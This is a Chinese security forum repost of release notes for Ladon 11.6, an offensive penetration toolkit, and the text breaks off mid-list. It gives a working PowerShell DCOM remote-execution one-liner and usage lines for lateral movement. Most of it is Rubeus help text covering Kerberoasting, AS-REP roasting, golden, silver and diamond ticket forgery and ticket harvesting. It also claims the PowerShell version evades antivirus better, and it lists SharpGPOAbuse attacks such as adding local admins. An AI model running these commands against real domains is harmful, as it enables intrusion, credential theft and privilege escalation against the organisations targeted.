安全矩阵

 找回密码
 立即注册
搜索
查看: 1154|回复: 0

Ladon11.6域渗透(Rubeus: Kerbero、GPO、TGT) Dcom横向移动(MMC、ShellW...

[复制链接]

417

主题

417

帖子

2391

积分

金牌会员

Rank: 6Rank: 6

积分
2391
发表于 2023-9-11 18:09:19 | 显示全部楼层 |阅读模式
本帖最后由 ivi 于 2023-9-11 18:11 编辑

k8gege K8实验室 2023-09-11 09:11 发表于广西

Ladon 11.6 20230911
  1. [+]MmcExec        Dcom远程执行命令之MMC20(域控或管理员权限、需目标关闭防火墙) 横向移动 内网渗透 支持BASE64命令
  2. [+]ShellExec      Dcom远程执行命令之ShellWindows(域控或管理员权限、需目标关闭防火墙) 横向移动 内网渗透 支持BASE64命令
  3. [+]ShellBrowserExec    Dcom远程执行命令之ShellBrowserWindow(域控或管理员权限、需目标关闭防火墙) 横向移动 内网渗透 支持BASE64命令
  4. [+]SharpSphere      .NET>=4.0 SharpSphere 使红队人员能够轻松地与 vCenter 管理的虚拟机的来宾操作系统进行交互 执行命令
  5. [+]noPac        .NET>=4.0 域渗透 域内提权CVE-2021-42287/CVE-2021-42278 横向移动 内网渗透
  6. [+]SharpGPOAbuse    .NET>=4.0 域渗透 组策略(GPO)横向移动 内网渗透 下发脚本
  7. [+]Rubeus           .NET>=4.0 域渗透 Kerberos攻击比如TGT请求/ST请求/AS-REP Roasting/Kerberoasting/委派攻击/黄金票据/白银票据/钻石票据/蓝宝石票据等
  8. [u]LadonEXP        结果不含路径 也可自动解密
  9. [u]PostShell      结果不含路径 也可自动解密
  10. [u]web          AuthBasic认证监听 捕获密码 解密bug修复
  11. [u]Ladon.ps1      默认使用Ladon40版本,Win10/11是主流系统,Win7可自行转换Ladon35
  12. [u]Ladon.exe      默认使用Ladon48版本
复制代码

Ladon.ps1,PowerShell版免杀效果比exe更好,自行根据实际情况使用
0x001 Dcom远程执行命令之MMC20
Dcom执行条件:
1 域控或管理员权限
2 需目标关闭防火墙
PowerShell

  1. [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.50.18")).Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/k calc.exe","Minimzed")
复制代码

Ladon MmcExec
  1. Usage:
  2. Ladon MmcExec host cmdline
  3. Ladon MmcExec 127.0.0.1 calc
  4. Ladon MmcExec 127.0.0.1 Y2FsYw==
复制代码


Ladon.ps1
  1. powershell -exec bypass Import-Module .\Ladon.ps1;Ladon MmcExec 127.0.0.1 calc
  2. powershell -exec bypass Import-Module .\Ladon.ps1;Ladon MmcExec 127.0.0.1 Y2FsYw==
复制代码




执行的命令包含双引号或其它特殊符号,特别是在CS或其它shell下使用,可以使用base64加密需要执行的cmd命令,如calc加密后Y2FsYw==

Cobalt Strike命令行用法与EXE版用法完全一致 (Ladon其它功能同理)
  1. Ladon MmcExec 127.0.0.1 calc
  2. Ladon MmcExec 127.0.0.1 Y2FsYw==
复制代码




0x002 Dcom远程执行命令之ShellWindows
Ladon ShellExec
  1. Usage:
  2. Ladon ShellExec host cmdline
  3. Ladon ShellExec 127.0.0.1 calc
  4. Ladon ShellExec 127.0.0.1 Y2FsYw==
复制代码



Ladon.ps1
  1. powershell -exec bypass Import-Module .\Ladon.ps1;Ladon ShellExec 127.0.0.1 calc
  2. powershell -exec bypass Import-Module .\Ladon.ps1;Ladon ShellExec 127.0.0.1 Y2FsYw==
复制代码


0x003 Dcom远程执行命令之ShellBrowserWindow
Ladon ShellBrowserExec
  1. Usage:
  2. Ladon ShellBrowserExec host cmdline
  3. Ladon ShellBrowserExec 127.0.0.1 calc
  4. Ladon ShellBrowserExec 127.0.0.1 Y2FsYw==
复制代码


Ladon.ps1
  1. powershell -exec bypass Import-Module .\Ladon.ps1;Ladon ShellBrowserExec 127.0.0.1 calc
  2. powershell -exec bypass Import-Module .\Ladon.ps1;Ladon ShellBrowserExec 127.0.0.1 Y2FsYw==
复制代码


0x004   Rubeus域渗透 Kerberos攻击工具   [color=rgba(0, 0, 0, 0.9)]      
.NET>=4.0 域渗透 Kerberos攻击比如TGT请求/ST请求/AS-REP Roasting/Kerberoasting/委派攻击/黄金票据/白银票据/钻石票据/蓝宝石票据等

Ladon Rubeus
  1. Load Rubeus
  2. Rubeus v2.2.3


  3. Ticket requests and renewals:

  4.     Retrieve a TGT based on a user password/hash, optionally saving to a file or applying to the current logon session or a specific LUID:
  5.         Ladon.exe Rubeus asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/oldsam] [/proxyurl:https://KDC_PROXY/kdcproxy] [/principaltype:principal|enterprise|x500|srv_xhost|srv_host|srv_inst]

  6.     Retrieve a TGT based on a user password/hash, start a /netonly process, and to apply the ticket to the new process/logon session:
  7.         Ladon.exe Rubeus asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/opsec] [/nopac] [/oldsam] [/proxyurl:https://KDC_PROXY/kdcproxy] [/principaltype:principal|enterprise|x500|srv_xhost|srv_host|srv_inst]

  8.     Retrieve a TGT using a PCKS12 certificate, start a /netonly process, and to apply the ticket to the new process/logon session:
  9.         Ladon.exe Rubeus asktgt /user:USER /certificate:C:\temp\leaked.pfx </password:STOREPASSWORD> /createnetonly:C:\Windows\System32\cmd.exe [/getcredentials] [/servicekey:KRBTGTKEY] [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/principaltype:principal|enterprise|x500|srv_xhost|srv_host|srv_inst]

  10.     Retrieve a TGT using a certificate from the users keystore (Smartcard) specifying certificate thumbprint or subject, start a /netonly process, and to apply the ticket to the new process/logon session:
  11.         Ladon.exe Rubeus asktgt /user:USER /certificate:f063e6f4798af085946be6cd9d82ba3999c7ebac /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/principaltype:principal|enterprise|x500|srv_xhost|srv_host|srv_inst]

  12.     Request a TGT without sending pre-auth data:
  13.         Ladon.exe Rubeus asktgt /user:USER [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/principaltype:principal|enterprise|x500|srv_xhost|srv_host|srv_inst]

  14.     Request a service ticket using an AS-REQ:
  15.         Ladon.exe Rubeus asktgt /user:USER /service:SPN </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/oldsam] [/proxyurl:https://KDC_PROXY/kdcproxy]

  16.     Retrieve a service ticket for one or more SPNs, optionally saving or applying the ticket:
  17.         Ladon.exe Rubeus asktgs </ticket:BASE64 | /ticket:FILE.KIRBI> </service:SPN1,SPN2,...> [/enctype:DES|RC4|AES128|AES256] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/enterprise] [/opsec] </tgs:BASE64 | /tgs:FILE.KIRBI> [/targetdomain] [/u2u] [/targetuser] [/servicekey:PASSWORDHASH] [/asrepkey:ASREPKEY] [/proxyurl:https://KDC_PROXY/kdcproxy]

  18.     Retrieve a service ticket using the Kerberos Key List Request options:
  19.         Ladon.exe Rubeus asktgs /keyList /service:KRBTGT_SPN </ticket:BASE64 | /ticket:FILE.KIRBI> [/enctype:DES|RC4|AES128|AES256] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/enterprise] [/opsec] </tgs:BASE64 | /tgs:FILE.KIRBI> [/targetdomain] [/u2u] [/targetuser] [/servicekey:PASSWORDHASH] [/asrepkey:ASREPKEY] [/proxyurl:https://KDC_PROXY/kdcproxy]

  20.     Renew a TGT, optionally applying the ticket, saving it, or auto-renewing the ticket up to its renew-till limit:
  21.         Ladon.exe Rubeus renew </ticket:BASE64 | /ticket:FILE.KIRBI> [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/autorenew] [/nowrap]

  22.     Perform a Kerberos-based password bruteforcing attack:
  23.         Ladon.exe Rubeus brute </password:PASSWORD | /passwords:PASSWORDS_FILE> [/user:USER | /users:USERS_FILE] [/domain:DOMAIN] [/creduser:DOMAIN\\USER & /credpassword:PASSWORD] [/ou:ORGANIZATION_UNIT] [/dc:DOMAIN_CONTROLLER] [/outfile:RESULT_PASSWORD_FILE] [/noticket] [/verbose] [/nowrap]

  24.     Perform a scan for account that do not require pre-authentication:
  25.         Ladon.exe Rubeus preauthscan /users:C:\temp\users.txt [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/proxyurl:https://KDC_PROXY/kdcproxy]


  26. Constrained delegation abuse:

  27.     Perform S4U constrained delegation abuse:
  28.         Ladon.exe Rubeus s4u </ticket:BASE64 | /ticket:FILE.KIRBI> </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec] [/self] [/proxyurl:https://KDC_PROXY/kdcproxy]
  29.         Ladon.exe Rubeus s4u /user:USER </rc4:HASH | /aes256:HASH> [/domain:DOMAIN] </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec] [/self] [/bronzebit] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy]

  30.     Perform S4U constrained delegation abuse across domains:
  31.         Ladon.exe Rubeus s4u /user:USER </rc4:HASH | /aes256:HASH> [/domain:DOMAIN] </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER /targetdomain:DOMAIN.LOCAL /targetdc:DC.DOMAIN.LOCAL [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/self] [/nopac]


  32. Ticket Forgery:

  33.     Forge a golden ticket using LDAP to gather the relevent information:
  34.         Ladon.exe Rubeus golden </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> /ldap [/printcmd] [outfile:FILENAME] [/ptt]

  35.     Forge a golden ticket using LDAP to gather the relevent information but explicitly overriding some values:
  36.         Ladon.exe Rubeus golden </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> /ldap [/dc:DOMAIN_CONTROLLER] [/domain:DOMAIN] [/netbios:NETBIOS_DOMAIN] [/sid:DOMAIN_SID] [/dispalyname:PAC_FULL_NAME] [/badpwdcount:INTEGER] [/flags:TICKET_FLAGS] [/uac:UAC_FLAGS] [/groups:GROUP_IDS] [/pgid:PRIMARY_GID] [/homedir:HOMEDIR] [/homedrive:HOMEDRIVE] [/id:USER_ID] [/logofftime:LOGOFF_TIMESTAMP] [/lastlogon:LOGON_TIMESTAMP] [/logoncount:INTEGER] [/passlastset:PASSWORD_CHANGE_TIMESTAMP] [/maxpassage:RELATIVE_TO_PASSLASTSET] [/minpassage:RELATIVE_TO_PASSLASTSET] [/profilepath:PROFILE_PATH] [/scriptpath:LOGON_SCRIPT_PATH] [/sids:EXTRA_SIDS] [[/resourcegroupsid:RESOURCEGROUPS_SID] [/resourcegroups:GROUP_IDS]] [/authtime:AUTH_TIMESTAMP] [/starttime:Start_TIMESTAMP] [/endtime:RELATIVE_TO_STARTTIME] [/renewtill:RELATIVE_TO_STARTTIME] [/rangeend:RELATIVE_TO_STARTTIME] [/rangeinterval:RELATIVE_INTERVAL] [/oldpac] [/extendedupndns] [/printcmd] [outfile:FILENAME] [/ptt]

  37.     Forge a golden ticket, setting values explicitly:
  38.         Ladon.exe Rubeus golden </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </domain:DOMAIN> </sid:DOMAIN_SID> [/dc:DOMAIN_CONTROLLER] [/netbios:NETBIOS_DOMAIN] [/dispalyname:PAC_FULL_NAME] [/badpwdcount:INTEGER] [/flags:TICKET_FLAGS] [/uac:UAC_FLAGS] [/groups:GROUP_IDS] [/pgid:PRIMARY_GID] [/homedir:HOMEDIR] [/homedrive:HOMEDRIVE] [/id:USER_ID] [/logofftime:LOGOFF_TIMESTAMP] [/lastlogon:LOGON_TIMESTAMP] [/logoncount:INTEGER] [/passlastset:PASSWORD_CHANGE_TIMESTAMP] [/maxpassage:RELATIVE_TO_PASSLASTSET] [/minpassage:RELATIVE_TO_PASSLASTSET] [/profilepath:PROFILE_PATH] [/scriptpath:LOGON_SCRIPT_PATH] [/sids:EXTRA_SIDS] [[/resourcegroupsid:RESOURCEGROUPS_SID] [/resourcegroups:GROUP_IDS]] [/authtime:AUTH_TIMESTAMP] [/starttime:Start_TIMESTAMP] [/endtime:RELATIVE_TO_STARTTIME] [/renewtill:RELATIVE_TO_STARTTIME] [/rangeend:RELATIVE_TO_STARTTIME] [/rangeinterval:RELATIVE_INTERVAL] [/oldpac] [/extendedupndns] [/printcmd] [outfile:FILENAME] [/ptt]

  39.     Forge a golden ticket for a read only domain controller (for Key List Requests):
  40.         Ladon.exe Rubeus golden </rodcNumber:RODC_NUM> </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </domain:DOMAIN> </sid:DOMAIN_SID> [/dc:DOMAIN_CONTROLLER] [/netbios:NETBIOS_DOMAIN] [/dispalyname:PAC_FULL_NAME] [/badpwdcount:INTEGER] [/flags:TICKET_FLAGS] [/uac:UAC_FLAGS] [/groups:GROUP_IDS] [/pgid:PRIMARY_GID] [/homedir:HOMEDIR] [/homedrive:HOMEDRIVE] [/id:USER_ID] [/logofftime:LOGOFF_TIMESTAMP] [/lastlogon:LOGON_TIMESTAMP] [/logoncount:INTEGER] [/passlastset:PASSWORD_CHANGE_TIMESTAMP] [/maxpassage:RELATIVE_TO_PASSLASTSET] [/minpassage:RELATIVE_TO_PASSLASTSET] [/profilepath:PROFILE_PATH] [/scriptpath:LOGON_SCRIPT_PATH] [/sids:EXTRA_SIDS] [[/resourcegroupsid:RESOURCEGROUPS_SID] [/resourcegroups:GROUP_IDS]] [/authtime:AUTH_TIMESTAMP] [/starttime:Start_TIMESTAMP] [/endtime:RELATIVE_TO_STARTTIME] [/renewtill:RELATIVE_TO_STARTTIME] [/rangeend:RELATIVE_TO_STARTTIME] [/rangeinterval:RELATIVE_INTERVAL] [/oldpac] [/extendedupndns] [/printcmd] [outfile:FILENAME] [/ptt]

  41.     Forge a silver ticket using LDAP to gather the relevent information:
  42.         Ladon.exe Rubeus silver </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </service:SPN> /ldap [/extendedupndns] [/nofullpacsig] [/printcmd] [outfile:FILENAME] [/ptt]

  43.     Forge a silver ticket using LDAP to gather the relevent information, using the KRBTGT key to calculate the KDCChecksum and TicketChecksum:
  44.         Ladon.exe Rubeus silver </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </service:SPN> /ldap </krbkey:HASH> [/krbenctype:DES|RC4|AES128|AES256] [/extendedupndns] [/nofullpacsig] [/printcmd] [outfile:FILENAME] [/ptt]

  45.     Forge a silver ticket using LDAP to gather the relevent information but explicitly overriding some values:
  46.         Ladon.exe Rubeus silver </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </service:SPN> /ldap [/dc:DOMAIN_CONTROLLER] [/domain:DOMAIN] [/netbios:NETBIOS_DOMAIN] [/sid:DOMAIN_SID] [/dispalyname:PAC_FULL_NAME] [/badpwdcount:INTEGER] [/flags:TICKET_FLAGS] [/uac:UAC_FLAGS] [/groups:GROUP_IDS] [/pgid:PRIMARY_GID] [/homedir:HOMEDIR] [/homedrive:HOMEDRIVE] [/id:USER_ID] [/logofftime:LOGOFF_TIMESTAMP] [/lastlogon:LOGON_TIMESTAMP] [/logoncount:INTEGER] [/passlastset:PASSWORD_CHANGE_TIMESTAMP] [/maxpassage:RELATIVE_TO_PASSLASTSET] [/minpassage:RELATIVE_TO_PASSLASTSET] [/profilepath:PROFILE_PATH] [/scriptpath:LOGON_SCRIPT_PATH] [/sids:EXTRA_SIDS] [[/resourcegroupsid:RESOURCEGROUPS_SID] [/resourcegroups:GROUP_IDS]] [/authtime:AUTH_TIMESTAMP] [/starttime:Start_TIMESTAMP] [/endtime:RELATIVE_TO_STARTTIME] [/renewtill:RELATIVE_TO_STARTTIME] [/rangeend:RELATIVE_TO_STARTTIME] [/rangeinterval:RELATIVE_INTERVAL] [/authdata] [/extendedupndns] [/nofullpacsig] [/printcmd] [outfile:FILENAME] [/ptt]

  47.     Forge a silver ticket using LDAP to gather the relevent information and including an S4UDelegationInfo PAC section:
  48.         Ladon.exe Rubeus silver </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </service:SPN> /ldap [/s4uproxytarget:TARGETSPN] [/s4utransitedservices:SPN1,SPN2,...] [/printcmd] [outfile:FILENAME] [/ptt]

  49.     Forge a silver ticket using LDAP to gather the relevent information and setting a different cname and crealm:
  50.         Ladon.exe Rubeus silver </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </service:SPN> /ldap [/cname:CLIENTNAME] [/crealm:CLIENTDOMAIN] [/printcmd] [outfile:FILENAME] [/ptt]

  51.     Forge a silver ticket, setting values explicitly:
  52.         Ladon.exe Rubeus silver </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </service:SPN> </domain:DOMAIN> </sid:DOMAIN_SID> [/dc:DOMAIN_CONTROLLER] [/netbios:NETBIOS_DOMAIN] [/dispalyname:PAC_FULL_NAME] [/badpwdcount:INTEGER] [/flags:TICKET_FLAGS] [/uac:UAC_FLAGS] [/groups:GROUP_IDS] [/pgid:PRIMARY_GID] [/homedir:HOMEDIR] [/homedrive:HOMEDRIVE] [/id:USER_ID] [/logofftime:LOGOFF_TIMESTAMP] [/lastlogon:LOGON_TIMESTAMP] [/logoncount:INTEGER] [/passlastset:PASSWORD_CHANGE_TIMESTAMP] [/maxpassage:RELATIVE_TO_PASSLASTSET] [/minpassage:RELATIVE_TO_PASSLASTSET] [/profilepath:PROFILE_PATH] [/scriptpath:LOGON_SCRIPT_PATH] [/sids:EXTRA_SIDS] [[/resourcegroupsid:RESOURCEGROUPS_SID] [/resourcegroups:GROUP_IDS]] [/authtime:AUTH_TIMESTAMP] [/starttime:Start_TIMESTAMP] [/endtime:RELATIVE_TO_STARTTIME] [/renewtill:RELATIVE_TO_STARTTIME] [/rangeend:RELATIVE_TO_STARTTIME] [/rangeinterval:RELATIVE_INTERVAL] [/authdata] [/cname:CLIENTNAME] [/crealm:CLIENTDOMAIN] [/s4uproxytarget:TARGETSPN] [/s4utransitedservices:SPN1,SPN2,...] [/extendedupndns] [/nofullpacsig] [/printcmd] [outfile:FILENAME] [/ptt]

  53.     Forge a diamond TGT by requesting a TGT based on a user password/hash:
  54.         Ladon.exe Rubeus diamond /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/createnetonly:C:\Windows\System32\cmd.exe] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/krbkey:HASH] [/ticketuser:USERNAME] [/ticketuserid:USER_ID] [/groups:GROUP_IDS] [/sids:EXTRA_SIDS]

  55.     Forge a diamond TGT by requesting a TGT using a PCKS12 certificate:
  56.         Ladon.exe Rubeus diamond /user:USER /certificate:C:\temp\leaked.pfx </password:STOREPASSWORD> [/createnetonly:C:\Windows\System32\cmd.exe] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/krbkey:HASH] [/ticketuser:USERNAME] [/ticketuserid:USER_ID] [/groups:GROUP_IDS] [/sids:EXTRA_SIDS]

  57.      Forge a diamond TGT by requesting a TGT using tgtdeleg:
  58.         Ladon.exe Rubeus diamond /tgtdeleg [/createnetonly:C:\Windows\System32\cmd.exe] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/krbkey:HASH] [/ticketuser:USERNAME] [/ticketuserid:USER_ID] [/groups:GROUP_IDS] [/sids:EXTRA_SIDS]


  59. Ticket management:

  60.     Submit a TGT, optionally targeting a specific LUID (if elevated):
  61.         Ladon.exe Rubeus ptt </ticket:BASE64 | /ticket:FILE.KIRBI> [/luid:LOGINID]

  62.     Purge tickets from the current logon session, optionally targeting a specific LUID (if elevated):
  63.         Ladon.exe Rubeus purge [/luid:LOGINID]

  64.     Parse and describe a ticket (service ticket or TGT):
  65.         Ladon.exe Rubeus describe </ticket:BASE64 | /ticket:FILE.KIRBI> [/servicekey:HASH] [/krbkey:HASH] [/asrepkey:HASH] [/serviceuser:USERNAME] [/servicedomain:DOMAIN]


  66. Ticket extraction and harvesting:

  67.     Triage all current tickets (if elevated, list for all users), optionally targeting a specific LUID, username, or service:
  68.         Ladon.exe Rubeus triage [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM]

  69.     List all current tickets in detail (if elevated, list for all users), optionally targeting a specific LUID:
  70.         Ladon.exe Rubeus klist [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM]

  71.     Dump all current ticket data (if elevated, dump for all users), optionally targeting a specific service/LUID:
  72.         Ladon.exe Rubeus dump [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM] [/nowrap]

  73.     Retrieve a usable TGT .kirbi for the current user (w/ session key) without elevation by abusing the Kerberos GSS-API, faking delegation:
  74.         Ladon.exe Rubeus tgtdeleg [/target:SPN]

  75.     Monitor every /interval SECONDS (default 60) for new TGTs:
  76.         Ladon.exe Rubeus monitor [/interval:SECONDS] [/targetuser:USER] [/nowrap] [/registry:SOFTWARENAME] [/runfor:SECONDS]

  77.     Monitor every /monitorinterval SECONDS (default 60) for new TGTs, auto-renew TGTs, and display the working cache every /displayinterval SECONDS (default 1200):
  78.         Ladon.exe Rubeus harvest [/monitorinterval:SECONDS] [/displayinterval:SECONDS] [/targetuser:USER] [/nowrap] [/registry:SOFTWARENAME] [/runfor:SECONDS]


  79. Roasting:

  80.     Perform Kerberoasting:
  81.         Ladon.exe Rubeus kerberoast [[/spn:"blah/blah"] | [/spns:C:\temp\spns.txt]] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] [/ldaps] [/nowrap]

  82.     Perform Kerberoasting, outputting hashes to a file:
  83.         Ladon.exe Rubeus kerberoast /outfile:hashes.txt [[/spn:"blah/blah"] | [/spns:C:\temp\spns.txt]] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] [/ldaps]

  84.     Perform Kerberoasting, outputting hashes in the file output format, but to the console:
  85.         Ladon.exe Rubeus kerberoast /simple [[/spn:"blah/blah"] | [/spns:C:\temp\spns.txt]] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] [/ldaps] [/nowrap]

  86.     Perform Kerberoasting with alternate credentials:
  87.         Ladon.exe Rubeus kerberoast /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD [/spn:"blah/blah"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] [/ldaps] [/nowrap]

  88.     Perform Kerberoasting with an existing TGT:
  89.         Ladon.exe Rubeus kerberoast </spn:"blah/blah" | /spns:C:\temp\spns.txt> </ticket:BASE64 | /ticket:FILE.KIRBI> [/nowrap]

  90.     Perform Kerberoasting with an existing TGT using an enterprise principal:
  91.         Ladon.exe Rubeus kerberoast </spn:user@domain.com | /spns:user1@domain.com,user2@domain.com> /enterprise </ticket:BASE64 | /ticket:FILE.KIRBI> [/nowrap]

  92.     Perform Kerberoasting with an existing TGT and automatically retry with the enterprise principal if any fail:
  93.         Ladon.exe Rubeus kerberoast </ticket:BASE64 | /ticket:FILE.KIRBI> /autoenterprise [/ldaps] [/nowrap]

  94.     Perform Kerberoasting using the tgtdeleg ticket to request service tickets - requests RC4 for AES accounts:
  95.         Ladon.exe Rubeus kerberoast /usetgtdeleg [/ldaps] [/nowrap]

  96.     Perform "opsec" Kerberoasting, using tgtdeleg, and filtering out AES-enabled accounts:
  97.         Ladon.exe Rubeus kerberoast /rc4opsec [/ldaps] [/nowrap]

  98.     List statistics about found Kerberoastable accounts without actually sending ticket requests:
  99.         Ladon.exe Rubeus kerberoast /stats [/ldaps] [/nowrap]

  100.     Perform Kerberoasting, requesting tickets only for accounts with an admin count of 1 (custom LDAP filter):
  101.         Ladon.exe Rubeus kerberoast /ldapfilter:'admincount=1' [/ldaps] [/nowrap]

  102.     Perform Kerberoasting, requesting tickets only for accounts whose password was last set between 01-31-2005 and 03-29-2010, returning up to 5 service tickets:
  103.         Ladon.exe Rubeus kerberoast /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:5 [/ldaps] [/nowrap]

  104.     Perform Kerberoasting, with a delay of 5000 milliseconds and a jitter of 30%:
  105.         Ladon.exe Rubeus kerberoast /delay:5000 /jitter:30 [/ldaps] [/nowrap]

  106.     Perform AES Kerberoasting:
  107.         Ladon.exe Rubeus kerberoast /aes [/ldaps] [/nowrap]

  108.     Perform Kerberoasting using an account without pre-auth by sending AS-REQ's:
  109.         Ladon.exe Rubeus kerberoast </spn:"blah/blah" | /spns:C:\temp\spns.txt> /nopreauth:USER /domain:DOMAIN [/dc:DOMAIN_CONTROLLER] [/nowrap]

  110.     Perform AS-REP "roasting" for any users without preauth:
  111.         Ladon.exe Rubeus asreproast [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] [/ldaps] [/nowrap]

  112.     Perform AS-REP "roasting" for any users without preauth, outputting Hashcat format to a file:
  113.         Ladon.exe Rubeus asreproast /outfile:hashes.txt /format:hashcat [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] [/ldaps]

  114.     Perform AS-REP "roasting" for any users without preauth using alternate credentials:
  115.         Ladon.exe Rubeus asreproast /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU,..."] [/ldaps] [/nowrap]

  116.     Perform AES AS-REP "roasting":
  117.         Ladon.exe Rubeus asreproast [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] /aes [/ldaps] [/nowrap]


  118. Miscellaneous:

  119.     Create a hidden program (unless /show is passed) with random (or user-defined) /netonly credentials, displaying the PID and LUID:
  120.         Ladon.exe Rubeus createnetonly /program:"C:\Windows\System32\cmd.exe" [/show] [/username:USERNAME] [/domain:DOMAIN] [/password:PASSWORD]

  121.     Reset a user's password from a supplied TGT (AoratoPw):
  122.         Ladon.exe Rubeus changepw </ticket:BASE64 | /ticket:FILE.KIRBI> /new:PASSWORD [/dc:DOMAIN_CONTROLLER] [/targetuser:DOMAIN\USERNAME]

  123.     Calculate rc4_hmac, aes128_cts_hmac_sha1, aes256_cts_hmac_sha1, and des_cbc_md5 hashes:
  124.         Ladon.exe Rubeus hash /password:X [/user:USER] [/domain:DOMAIN]

  125.     Substitute an sname or SPN into an existing service ticket:
  126.         Ladon.exe Rubeus tgssub </ticket:BASE64 | /ticket:FILE.KIRBI> /altservice:ldap [/srealm:DOMAIN] [/ptt] [/luid] [/nowrap]
  127.         Ladon.exe Rubeus tgssub </ticket:BASE64 | /ticket:FILE.KIRBI> /altservice:cifs/computer.domain.com [/srealm:DOMAIN] [/ptt] [/luid] [/nowrap]

  128.     Display the current user's LUID:
  129.         Ladon.exe Rubeus currentluid

  130.     Display information about the (current) or (target) logon session, default all readable:
  131.         Ladon.exe Rubeus logonsession [/current] [/luid:X]

  132.     The "/consoleoutfile:C:\FILE.txt" argument redirects all console output to the file specified.

  133.     The "/nowrap" flag prevents any base64 ticket blobs from being column wrapped for any function.

  134.     The "/debug" flag outputs ASN.1 debugging information.

  135.     Convert an AS-REP and a key to a Kirbi:
  136.         Ladon.exe Rubeus asrep2kirbi /asrep:<BASE64 | FILEPATH> </key:BASE64 | /keyhex:HEXSTRING> [/enctype:DES|RC4|AES128|AES256] [/ptt] [/luid:X] [/nowrap]


  137. NOTE: Base64 ticket blobs can be decoded with :

  138.     [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("aa..."))

复制代码

0x005 域渗透 SharpGPOAbuse 组策略(GPO)横向移动
Ladon SharpGPOAbuse
  1. Usage:
  2.   Ladon.exe SharpGPOAbuse <AttackType> <AttackOptions>

  3. Attack Types:
  4. --AddUserRights
  5.   Add rights to a user account
  6. --AddLocalAdmin
  7.   Add a new local admin. This will replace any existing local admins!
  8. --AddComputerScript
  9.   Add a new computer startup script
  10. --AddUserScript
  11.   Add a new user startup script
  12. --AddComputerTask
